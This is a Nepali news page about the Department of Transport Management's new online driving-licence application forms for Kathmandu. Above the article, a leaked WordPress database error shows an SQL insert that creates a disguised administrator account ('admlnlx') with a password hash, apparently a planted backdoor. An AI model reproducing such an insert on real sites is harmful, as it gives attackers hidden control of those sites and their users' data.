WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpRN0sfB30Frnu6dLt.ebqf7.3m2na/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 13:24:42', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ७-
सवारी चालक अनुमति पत्र (लाइसेन्स)का लागि अब रातिदेखि नै लाइन बस्न नपर्ने भएको छ । यातायात व्यवस्था विभागले सोमबारदेखि अनलाइनमै फारम भर्ने सुविधा ल्याएको छ ।
सुरुवातमा यो सेवा काठमाडौं उपत्यकामा मात्र लागू हुनेछ । विभागका अनुसार फारम त देशभरीबाटै भर्न सकिनेछ । तर, अनलाइन फारम भनेकाहरुको लिखित परीक्षादेखि ट्रायल सबै काठमाडौंमै हुनेछ ।
विभागले अनलाइन लाइसेन्स फारम र सवारी रजिष्ट्रेशन सिस्टमलाई तयार पारेको धेरै भएको थियो । तर, सेवा सुरु गरेको थिएन । जसका कारण लाइसेन्सका लागि फारम भर्न घन्टौंसम्म लाइनमा बस्नु परेको थियो ।
मनिसहरु विभागको कार्यालय एकान्तकुनामा लाइसेन्स फारम बुझाउन एकै दिन ५ हजार जनाभन्दा बढी लाइनमा बस्थे । तर, विभागले दिनमा ८ सयसम्म लाइसेन्स मात्र फारम बुझ्ने गरेको थियो ।